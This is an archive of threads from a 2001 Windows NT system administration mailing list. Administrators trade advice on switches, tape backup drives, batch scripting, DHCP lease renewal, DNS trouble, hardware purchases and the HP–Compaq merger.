Title: Message Just turn it on. IP address would be used for management. -Original Message-From: Roger Wright [mailto:[EMAIL PROTECTED]]Sent: Monday, September 10, 2001 1:26 PMTo: NT System Admin IssuesSubject: RE: Hub Recommendations Is a switch a "connect and go" device or would I need to do some configuration? Does it require an IP address? Roger Wright Southern Commerce Bank ___ IRS: Income Removal Service -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Monday, September 10, 2001 3:17 PMTo: NT System Admin IssuesSubject: RE: Hub Recommendations I agree that getting switches is the way to go. I've got a HP which is kind of nice because of the expansion capability. You just add 8-port modules as needed. -Original Message-From: Don Ely [mailto:[EMAIL PROTECTED]]Sent: Monday, September 10, 2001 12:13 PMTo: NT System Admin IssuesSubject: RE: Hub Recommendations Cisco Catalyst Series Switches are some of the best and most reliable. Managed switches are better if you're looking to trap SNMP traffic. D -Original Message-From: Roger Wright [mailto:[EMAIL PROTECTED]] Sent: Monday, September 10, 2001 12:09 PMTo: NT System Admin IssuesSubject: Hub Recommendations I need to replace one of my hubs (the smoke leaked out of the box) and would appreciate some recommendations. I'd like to get three 24 port auto-sensing 10/100 units.This will give me 8-10 spare ports for expansion in our 65-node network. What is the difference between a hub and a managed hub? Should I consider installing switches rather than plain hubs? Brand recommendations? We've been using Intel units but I have no loyalty to any particular product line at this time. Roger Wright Southern Commerce Bank ___ Among economists, the real world is often a special case. --Horngren http://www.sunbelt-software.com/ntsysadmin_list_charter.htm ___ NOTICE: The information contained in this electronic message is considered privileged and confidential under Florida Statutes 455.251 and 3905.017. 
It is intended solely for the use of the recipient named above. If the reader is not the recipient named above, you are hereby notified that any dissemination, distribution, copying or disclosure of the contents of this message is prohibited. If you have received this e-mail message in error, please immediately notify the sender and destroy the original message. http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm ___ NOTICE: The information contained in this electronic message is considered privileged and confidential under Florida Statutes 455.251 and 3905.017. It is intended solely for the use of the recipient named above. If the reader is not the recipient named above, you are hereby notified that any dissemination, distribution, copying or disclosure of the contents of this message is prohibited. If you have received this e-mail message in error, please immediately notify the sender and destroy the original message. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Backup Device Advice?
Title: RE: Backup Device Advice? I'm still using a Travan, which comes in a 20gig version. I've also got a VXA unit that I haven't put into production. It was about $800 at the time. -Original Message- From: Owsley, Kenneth [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 06, 2001 3:13 PM To: NT System Admin Issues Subject: RE: Backup Device Advice? DLT. Thats the only way to go. You can get an Quantum DLT 8000 for around $3,500 or so. Thats rated at 80GB with compression, but I typically get 75 or so GB on a tape. They are alos fast. Much faster than the helical scan technologies. -Original Message- From: Murray Binette [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 06, 2001 3:14 PM To: NT System Admin Issues Subject: Backup Device Advice? Our 4GB Travan tape drive is starting to get a bit for our Small Business Server (NT 4.0 sp6). We're looking at something in the 20+GB range. If anyone has any advice regarding. different types of tape drive technology (DDS vs. QIC vs. DAT) I'm not to sure what the advantages of one format over the other are. Thanks! Murray Binette Systems Administrator Cybertech Automation Inc. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Test Whether Variable Exists
Title: FW: Test Whether Variable Exists

He's probably having a problem with his e-mail. Unsubbing him isn't the answer. I think there was a bug in OL caused by IE if I'm not mistaken, for example.

-Original Message-
From: EALES, Jack / RSAIFS - IOM [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 07, 2001 6:35 AM
To: NT System Admin Issues
Subject: RE: Test Whether Variable Exists

Stu - can you get this guy unsubbed before he drives us all mad? A blank response to every posting is getting a little annoying ;-)

Cheers
Jack

-Original Message-
From: Pete Karhatsu [mailto:[EMAIL PROTECTED]]
Sent: 07 September 2001 14:17
To: NT System Admin Issues
Subject: FW: Test Whether Variable Exists

THIS MESSAGE ORIGINATED ON THE INTERNET - Please read the detailed disclaimer below.

-Original Message-
From: Colin Leeson [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 06, 2001 9:48 PM
To: NT System Admin Issues
Subject: RE: Test Whether Variable Exists

Try this

Date /t test.txt

...and notice the space after the date

Col

-Original Message-
From: Andrew S. Baker [mailto:[EMAIL PROTECTED]]
Sent: Friday, 7 September 2001 11:44
To: NT System Admin Issues
Subject: RE: Test Whether Variable Exists

Type either of the following at the command line:

SET TEST= HELLO

or

SET TEST=HELLO (with a trailing space)

Now type:

ECHO "%TEST%"

==
ASB - http://www.ultratech-llc.com/KB/?File=~MoreInfo.TXT
==
"Little progress can be made by merely attempting to repress what is evil. Our great hope lies in developing what is good." -- President Calvin Coolidge (1872-1933).
~~~ Keystrokes are an Endangered Species: http://www.shortkeys.com/ ~~~

-Original Message-
From: Correa, Andre [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 06, 2001 8:17 PM
To: NT System Admin Issues
Subject: RE: Test Whether Variable Exists

How do you set an environment variable with a space?? I have never seen that

Andre Correa
Senior Manager/Information Technology
Lexitron, Inc
(201) 892-6399

-Original Message-
From: Andrew Baker [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 06, 2001 7:14 PM
To: NT System Admin Issues
Subject: RE: Test Whether Variable Exists

Using double quotes is best because the command won't break if the environment variable contains a space

- ASB

-Original Message-
From: Correa, Andre [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 06, 2001 1:02 PM
To: NT System Admin Issues
Subject: RE: Test Whether Variable Exists

I believe that IF DEFINED only works on NT boxes, not 95/98. If it is an all NT environment, then it is OK. Otherwise, use syntax as follows:

If not {%somevar%}=={} echo Variable exists

The { sign can be replaced with quotes, but to each their own. The double = is very important, otherwise you will tear out every last strand of hair on your head

HTH

Andre Correa
Senior Manager/Information Technology
Lexitron, Inc
(201) 892-6399

-Original Message-
From: Torres, Edgar (GEP) [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 06, 2001 12:26 PM
To: NT System Admin Issues
Subject: RE: Test Whether Variable Exists

if defined MYVAR echo It exists!

__
Edgar Torres

-Original Message-
From: Simon Butler [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 06, 2001 12:22 PM
To: NT System Admin Issues
Subject: Test Whether Variable Exists

Hi,

This should be an easy one but I cannot find the answer after hours of searching. I am looking for a way that I can test whether a variable exists and then take action on the result. This is for use in a login script - not a KIX script. I don't want to add, change or delete the variable in anyway, just check whether it is there or not. Can anyone suggest a way?

Thanks,
Simon Butler.

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

--The following message has been automatically added by the mail gateway to comply with a Royal Sun Alliance IT Security requirement: As this email
RE: Compaq Evo Workstation W6000
Title: RE: Compaq Evo Workstation W6000 I've got an old HP Netserver, an IBM Netfinity 3000 and a whitebox from U-tron. They all work fine. The whitebox was significantly cheaper (like maybe 1/2 the price at the time for a compatible Dell, HP or Compag). -Original Message- From: Sean Martin [mailto:[EMAIL PROTECTED]] Sent: Friday, September 07, 2001 11:32 AM To: NT System Admin Issues Subject: RE: Compaq Evo Workstation W6000 He doesn't need a laptop. Current setup. Toshiba laptop for all applications and clone box NT server for file/print services. The NT server is useless and the laptop is falling apart. He wants to consolidate everything onto one computer. He wants disk mirroring capability (which I'm not even sure the Ultra160 controller can even do - still reading). He wanted something that was dual processor capable (even though I know he'll never use it or need it) and he wants something that will last awhile. Something 'cheap' wasn't one of his concerns. He runs a myriad of applications ranging from Office, Quicken, Vendor specific software and diagnostic software for ATM's and Kiosks (sp?), and countless others. He's an agent for NCR so he sells ATM's, Kiosk's, Cold Imaging solutions. I know the Evo would be more machine than he needs. I guess the better thing to do is ask for recommendations based on his needs/wants. Dual processor capable Disk mirroring - hardware (obviously) He basically wants a super computer that will fit under his desk. What would you all recommend based on your experiences with different brands? Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 
3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] -Original Message- From: Kevin Miller [mailto:[EMAIL PROTECTED]] Sent: Friday, September 07, 2001 9:56 AM To: NT System Admin Issues Subject: RE: Compaq Evo Workstation W6000 From a laptop to a server/? Sounds like more info on his business size and what he does would help? Buy him a nice dell laptop with a fire wire CDrw. sounds like my suggestion. Or if he does not need a laptop, get him a cheap HP machine. -Original Message- From: Sean Martin [mailto:[EMAIL PROTECTED]] Sent: Friday, September 07, 2001 1:40 PM To: NT System Admin Issues Subject: Compaq Evo Workstation W6000 Hey folks, My old man runs his own business out of his home and he's looking to get some new hardware. He currently runs all of his applications off of a 4 year old Toshiba laptop. He wants something that'll be robust, fast, provide some level of fault tolerance, and be reliable. Most of my experience is with Compaq so I'm starting with them. The machine I'm looking at is a Compaq Evo Workstation W6000. Specs: Intel Xeon 1.7Ghz (dual proc. capable), 512mb RDRAM/800, Integrated Ultra160 SCSI Drive - (1) 18.2gb/15k Ultra 160 SCSI drive and (1) 18.2 WideUltra3 SCSI 15k, cd, nic, blah, blah, running Win2k Pro. First, does anyone have any experience with this particular model? Likes - Dislikes? Second, there's no option for an internal tape drive, so what external models would you recommend? (to be safe, I'd go with tape storage equal to the amount of disk space) Thanks in advance for your suggestions, insight, warnings, etc... Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 
3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] DO NOT read, copy or disseminate this communication unless you are the intended addressee. This e-mail communication contains confidential and/or privileged information intended only for the addressee. If you have received this communication in error, please call us immediately at (907) 561-1250 and ask to speak to the sender of the communication. Also, please e-mail the sender and notify the sender immediately that you have received the communication in error. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm DO NOT read, copy or disseminate this communication unless you are the intended addressee. This e-mail communication contains confidential and/or privileged information intended only for the addressee. If you have received this communication in error, please call us immediately at (907) 561-1250 and ask to speak to the sender of the communication. Also, please e-mail the sender and notify the sender immediately that you have received the communication in error. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: email to replace fax?
Title: RE: email to replace fax? Are you trying to e-mail or fax? If e-mail, and your database of recipients is ODBC-compliant, then try the Gammadyne Mailer - www.gammadyne.com. You can create projects based on queries. -Original Message- From: thomas smith [mailto:[EMAIL PROTECTED]] Sent: Friday, September 07, 2001 2:12 PM To: NT System Admin Issues Subject: email to replace fax? I currently do my own price requests for equipment. (Purchasing does everything EXCEPT computer gear.) I use WinFax Pro. I have a database of recipients, organized into groups, based on hardware/software/whatever for which I require pricing. Using WinFax Pro requires that I use my modem. This is currently NOT a problem. But I HAVE been thinking... Perhaps I could accomplish the same thing via email. I personally don't use Outlook...yet. I'm still using Eudora. But from what I've seen, it doesn't APPEAR that either is particularly conducive to creating groups to accomplish the same thing. So I've been wondering... Assuming I'm correct about neither being particularly suited to doing what I'm wanting to do, does anyone know of some kind of email app that would allow this? (I know that WinFax Pro can interface to email. And I tried it...once. It sucks...assuming I was using it as designed...which I think I was.) Other than my Eudora client, Outlook or Exchange Server, I am ignorant of email package(s) for ANYTHING. Thanks in advance, you help is appreciated. :) - Thomas Smith IT Supervisor, AKA: Systems Administrator, Network Administrator, Database Administrator, Security Administrator, Email Administrator, Telecommunications Administrator, Webmaster Henry Co Water and Sewerage Authority 770.957.6659 (v) / 770.898.8416 (f) [EMAIL PROTECTED] http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Restore Question
What's wrong with their support? As much as I hate to admit it, they've always come thru for me. Of course I hesitate to ante up $250 for support calls, but it's been more cost effective than some of the support I'm paying for 3rd party products.

-Original Message-
From: Daniel Burns [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 06, 2001 10:49 AM
To: NT System Admin Issues
Subject: Re: Restore Question

LOL...Microsoft has support?? You mean other than Technet and User Groups?? Get out of here!

Dan

- Original Message -
From: Correa, Andre
To: NT System Admin Issues
Sent: Thursday, September 06, 2001 12:18 PM
Subject: RE: Restore Question

Cheapest way and maybe second fastest would be to install 2000 and then use Dcpromo to demote from Domain Controller to member server. Absolute fastest way might be to use U-Promote (third party utility), but Microsoft says they will discontinue support on a NT server that has been Upromoted (Oh no, what will I do without Microsoft Support??? takes tongue out of cheek)

Andre Correa
Senior Manager/Information Technology
Lexitron, Inc
(201) 892-6399

-Original Message-
From: Daniel Burns [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 06, 2001 12:58 PM
To: NT System Admin Issues
Subject: Restore Question

Has anyone ever tried to restore a machine back to its original state, except, BIG exception, without making it a BDC? I want to upgrade an old imaging system, that doesn't have support...long story, but I don't want this machine to be a DC anymore. I want to move to a Windows 2000 Network and I know I can do a mixed mode, but if I could do this, my job would be much easier. Weird question I know, but has anyone ever tried this??

Thanks,
Dan
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: IP Justification
Title: RE: IP Justification Sprint just gave me what I needed. In hindsight, I wish I could've just used NAT to simplify the process for the next time. -Original Message- From: David James [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 06, 2001 11:48 AM To: NT System Admin Issues Subject: IP Justification I'm using around 8 IP's right now, but my ISP is going bye bye at the end of this month. I'd like to have a block of IP's from the new ISP, just in case I need more etc. etc. What kind of ammunition do you guys use to justify your need for IP's? We currently have 128, but that's way too many. I can take care of everything I need with less than 32 for now, but you never know as far as the future. Any thoughts or strategies, experiences with this document? DJ http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Unable to resolve DNS
Title: RE: Unable to resolve DNS Guys/Gals - he's not getting these - he asked for a direct post to his account. -Original Message- From: Jeff Wilcox [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 05, 2001 7:47 AM To: NT System Admin Issues Subject: RE: Unable to resolve DNS There are a couple things to check: When you do a nslookup, does your dns server try to resolve the address? Do you have a reverse lookup zone created? Is your DNS server set to forward any requests to your ISP dns server? -Original Message- From: Neil Macdonald [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 05, 2001 10:48 AM To: NT System Admin Issues Subject: Unable to resolve DNS Hello, all. My NT server has suddenly stopped resolving DNS names. It's NT 4, sp 6a, connected to a router and an ADSL line to our providers site, where there are two DNS servers. I can ping out using IP addresses, but if I ping a www site I get bad IP address. I have reinstalled TCP/IP and service packed to no avail. I also removed RAS and an old external modem which wasn't being used (Tapisrv.exe was using some resources, and technet implied this may be a cause). All other PC's on the network can browse internet, without problem, so it's definitely the server. It was working one minute, then the next... nothing. I have updated antivirus and scanned, nothing there. Please help! Incidentally, I am not receiving the mails from the list, so please reply to [EMAIL PROTECTED] with ideas and I will be most grateful. Thank you one and all, Neil Macdonald http://www.sunbelt-software.com/ntsysadmin_list_charter.htm ** This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the e-mail originator. This footnote also confirms that this email message has been swept by MIMEsweeper for the presence of computer viruses.
However, please check this e-mail for virus infection for which CDG Management LLC accepts no responsibility ** http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Force DHCP clients to update
Title: Message http://support.microsoft.com/support/kb/articles/Q197/4/24.ASP for a VB example - looks like it clears the ip address. http://support.microsoft.com/support/kb/articles/Q217/0/35.ASP for a reghack to set win98 to automatically release dhcp info on shutdown. Either could be helpful. Guess it depends on the number of workstations if it's worth it. -Original Message- From: Brian Judge [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 9:27 AM To: NT System Admin Issues Subject: RE: Force DHCP clients to update According to m$, this can't be done. When a scope changes, clients will only automatically renew the lease after half the lease time has expired. Winipcfg has to be used for win95 clients (I think ipconfig /renew_all) will work for win98. -Original Message- From: Anthony [mailto:[EMAIL PROTECTED]] Sent: 04 September 2001 16:56 To: NT System Admin Issues Subject: Re: Force DHCP clients to update Hmmm, Anyhow, as with NT4 dhcp scopes, can you not just set the lease to 1 day or something? Then after a week, set it back to whatever you had set it to before? - Original Message - From: Martin Blackstone To: NT System Admin Issues Sent: Tuesday, September 04, 2001 3:51 PM Subject: RE: Force DHCP clients to update When I did this, I sent all my users an email with a simple .cmd file. @Echo Off IPConfig /Release IPConfig /renew exit -Original Message- From: Brian Judge [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 7:30 AM To: NT System Admin Issues Subject: Force DHCP clients to update Hi all. I've just changed a setting on my DHCP server (Win2k). I added in a gateway. Does anyone know of a way to force all clients to renew their lease, thus obtaining the updated information. I have a mixture of Win9x and Win2k clients. I was thinking of adding in an "ipconfig /release, ipconfig /renew etc." line into a login script but some win9x clients won't accept this. Any thoughts greatly appreciated.
Brian Judge The information in this e-mail (which includes any files transmitted with it) is confidential and may also be legally privileged. It is intended for the addressee only. Access to this email by anyone else is unauthorised. It is not to be relied upon by any other person other than the addressee except with our prior approval. If no such approval is given, we will not accept liability (in negligence or otherwise) rising from any third party acting, or refraining from acting, on such information. Unauthorised recipients are required to maintain confidentiality. If you have received this e-mail in error please notify us immediately, destroy any copies and delete it from your computer system. Any use, dissemination, forwarding, printing or copying of the email is prohibited. Copyright in this e-mail and any document created by us will be and remain vested in us and will not be transferred to you. We assert the right to be identified as the author of and to object to any misuses of the contents of this email or such documents. Grant Thornton is authorised by the Institute of Chartered Accountants in Ireland to carry on investment business. A list of partners may be inspected at Grant Thornton, Ashford House, Tara Street, Dublin 2, Ireland http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: HP to Acquire Compaq in $25B Deal
Title: Message Yup. Doesn't matter if it's merger, purchase or hostile takeover - heads will roll. Been there, done that. The only people that make out like bandits are the stationery people (letterhead, business cards, etc.) Hopefully the layoffs won't negatively affect service (it will of course, 'cause the bright sparks will see 30 HP techs and 30 Compaq techs and reason somehow that 35 techs can handle the combined load), and the 15k lives + family members negatively affected will find gainful employment. -Original Message- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 10:44 AM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal I have been through several mergers of large/Fortune 100 corporations (Union Bank of Switzerland and Swiss Bank/Paine Webber and Kidder Peabody) and can speak from experience when I say that there will be large cuts in the workforce of both companies to eliminate redundant functions. It is just common sense to cut costs by combining, wherever possible, duplicated functions. Where these cuts will occur is a matter of speculation, but you can be sure since HP has controlling interests they will generally get preferential treatment. xylog -Original Message- From: David James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 1:25 PM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal It's not a merger? You'd better learn big business. It's a merger, and don't expect to see too many changes too quickly. Compaq was already making big time changes in its product line before this even happened. HP was planning on getting out of the PC business anyways. A name change could happen, but who knows? I don't appreciate the naive comment anyhoo... You saying it's not a merger is naive... -Original Message- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 12:03 PM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal Except it's not a merger.
HP purchased compaq. HP's management now controls the Compaq's destiny. What this means is that HP will, in order to cut costs, eliminate all possible redundant functions. I agree it is a good merger, but it is very naïve to expect nothing to change. xylog -Original Message- From: David James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 12:48 PM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal I don't think there will be duplicate positions. I expect them to continue to function as 2 separate companies. Compaq's name is much bigger than HP, especially in the server market. I think HP just wanted a bigger piece of the PC and Server pie, and Compaq wanted the financial backing of HP's dominance in the peripheral and printer market. It's a good merger. -Original Message- From: Jim Underwood [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 11:32 AM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal Interesting articles at www.infoworld.com: 1. HP, Compaq target enterprise, services markets in $25 billion acquisition 2. Merger highlights role of HP's Fiorina While the merger may not guarantee an improvement in sales/performance, does anyone see a downside to the merger (other than HP/Compaq employees who will lose their job when duplicate positions are eliminated)? Do you expect the merger to provide better products and services? Best Regards, JMU http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: HP to Acquire Compaq in $25B Deal
Title: Message h, oooh, I know. He finds them on the internet, which he invented along with pants. -Original Message- From: Bill Higgins [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 11:38 AM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal William (1) Where do you find these things? (1) Hi William -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 11:32 To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal I hear the new HP Proliants will ship with WindowsRG: http://www.newgrounds.com/portal/uploads/27000/27549_winrg2.swf William -Original Message- From: C.E. GENE CONNOR [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 11:41 AM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal The combined entity, which will take the Hewlett-Packard name http://www.zdnet.com/zdnn/stories/news/0,4586,5096522,00.html?chkpt=zdnnt090401ts Gene C. aka C.E. Gene Connor Gene's Custom PC Service since 1989 Serving the U.S., Canada London, England -Original Message- From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 1:45 PM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal Agreed. - ASB -Original Message- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 1:44 PM To: NT System Admin Issues Subject: RE: HP to Acquire Compaq in $25B Deal I have been through several mergers of large/Fortune 100 corporations (Union Bank of Switzerland and Swiss Bank/Paine Webber and Kidder Peabody) and can speak from experience when I say that there will be large cuts in the workforce of both companies to eliminate redundant functions. It is just common sense to cut costs by combining, wherever possible, duplicated functions. Where these cuts will occur is a matter of speculation, but you can be sure since HP has controlling interests they will generally get preferential treatment.
xylog http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: nt40 desktop not appearing
Title: RE: nt40 desktop not appearing Is explorer running in taskmanager? if not, try adding it. -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Friday, August 31, 2001 9:19 AM To: NT System Admin Issues Subject: nt40 desktop not appearing After I rebooted my NT4.0 SP4 development server today it returned only the CTRL-ALT-DEL dialog box. The NT splash banner was not in the background. I logged in but only received a blank blue screen, no icons or desktop. No task bar etc. I can even hit CTRL-ALT-DEL and get the task manager dialog and that all works, but I cannot get access to the desktop. Anyone have any idea what the heck is going on? There is no virus, not connected to Internet or no programs have been installed. Thanks, John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Internet Explorer 6.0
Title: Message Got this from Lockergnome Tech Specialist: IE6 and McAfee No less than four readers wrote in to complain about Internet Explorer 6 and McAfee virus scanning software. While I don't consider this a Microsoft problem, some might. Norton AV seems to work just fine on one of my systems, but I can't personally speak for McAfee. Tread lightly around the issue, as their support has told two of those that wrote in very bluntly that they should simply reinstall IE 5.5x. That's a complete cop-out in my book. There was plenty of lead-time on IE6 for McAfee to get their act together, so I don't think there's any excuse for not having an update available. Just wanted to warn you. From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 15:49 To: NT System Admin Issues Subject: RE: Internet Explorer 6.0 Hmmm...No We have done a test rollout here to about 6 WKs. Nobody has reported any issues yet. -Original Message- From: Murray Freeman [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 1:39 PM To: NT System Admin Issues Subject: Internet Explorer 6.0 Well, a couple of us have installed IE 6.0 and we seem to be having frame problems. Pages display ads, but not the text just like when we print them sometimes. And on some, we get the text, but no sidebars. Any ideas? Murray http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Internet Explorer 6.0
Title: Message I dunno. You've got the whole snip from his newsletter. -Original Message- From: Allen Crawford [mailto:[EMAIL PROTECTED]] Sent: Friday, August 31, 2001 9:26 AM To: NT System Admin Issues Subject: RE: Internet Explorer 6.0 What exactly is the problem with McAfee and IE6? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Friday, August 31, 2001 11:19 AM To: NT System Admin Issues Subject: RE: Internet Explorer 6.0 Got this from Lockergnome Tech Specialist: IE6 and McAfee No less than four readers wrote in to complain about Internet Explorer 6 and McAfee virus scanning software. While I don't consider this a Microsoft problem, some might. Norton AV seems to work just fine on one of my systems, but I can't personally speak for McAfee. Tread lightly around the issue, as their support has told two of those that wrote in very bluntly that they should simply reinstall IE 5.5x. That's a complete cop-out in my book. There was plenty of lead-time on IE6 for McAfee to get their act together, so I don't think there's any excuse for not having an update available. Just wanted to warn you. From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 15:49 To: NT System Admin Issues Subject: RE: Internet Explorer 6.0 Hmmm...No We have done a test rollout here to about 6 WKs. Nobody has reported any issues yet. -Original Message- From: Murray Freeman [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 1:39 PM To: NT System Admin Issues Subject: Internet Explorer 6.0 Well, a couple of us have installed IE 6.0 and we seem to be having frame problems. Pages display ads, but not the text just like when we print them sometimes. And on some, we get the text, but no sidebars. Any ideas?
Murray http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: windows 2000 login script entry
Title: RE: windows 2000 login script entry usermanager allows you to select everyone via the control key I think. -Original Message- From: Paul Green [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 1:31 PM To: NT System Admin Issues Subject: windows 2000 login script entry Anyone know how to do a batch edit of all users? I need to change everyone's login script to login.bat. I have about 150 users to change. I'm using Windows 2000 Server with AD. Thanks, Paul _ Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (www.grisoft.com). Version: 6.0.274 / Virus Database: 144 - Release Date: 8/23/2001 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: windows 2000 login script entry
Title: RE: windows 2000 login script entry Now that I look at the subject again, I realize that my answer (albeit not as detailed as yours) works for NT. Guess it's the same for w2k too? -Original Message- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 2:28 PM To: NT System Admin Issues Subject: Re: windows 2000 login script entry More to the point after selecting multiple users via control and shift keys User Manager allows you to alter certain properties for all selected users and one of these properties happens to be the logon script setting. xylog - Original Message - From: [EMAIL PROTECTED] To: NT System Admin Issues Sent: Thursday, August 30, 2001 4:49 PM Subject: RE: windows 2000 login script entry usermanager allows you to select everyone via the control key I think. -Original Message- From: Paul Green [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 1:31 PM To: NT System Admin Issues Subject: windows 2000 login script entry Anyone know how to do a batch edit of all users? I need to change everyone's login script to login.bat. I have about 150 users to change. I'm using Windows 2000 Server with AD. Thanks, Paul _ Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (www.grisoft.com). Version: 6.0.274 / Virus Database: 144 - Release Date: 8/23/2001 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: License manager
Title: Message Don't sweat it. How do you think we learned? -Original Message- From: Mal Sasalu [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 9:36 AM To: NT System Admin Issues Subject: RE: License manager ok ok ok guys. Thanks. Dumbs like me still exists, who prefer Rum or Whisky over Beer. Thanks everyone for your input. -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 10:16 AM To: NT System Admin Issues Subject: RE: License manager How Martin installs NT: 1) Install W2K instead 2) Disable License Logging Service 3) Apply latest sp. 4) Eat fish tacos and drink beer -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 9:03 AM To: NT System Admin Issues Subject: RE: License manager How William installs NT: 1) Install NT 2) Disable License Logging Service 3) Apply latest sp. :o) -Original Message- From: Mal Sasalu [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 8:29 AM To: NT System Admin Issues Subject: FW: License manager Hi All I am sorry if this turns out to be a long question. I have joined new in this company. We have some weird problems with licensing. The domain controller (which is also our exchange) license manager shows like this

product                  per seat purchased   per seat allocated   per server purchased   per server reached
Microsoft exchange 5.5   0                    0                    0                      0
Microsoft exchange 5.5   0                    0                    0                      0
Microsoft exchange 5.5   0                    0                    0                      0
Microsoft exchange 5.5   0                    313                  0                      126
Microsoft SQL Server     0                    565                  220                    574

I am failing to interpret this. We have around 130 people working here. Thanks Mal http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: OT E-Mail Disclaimers
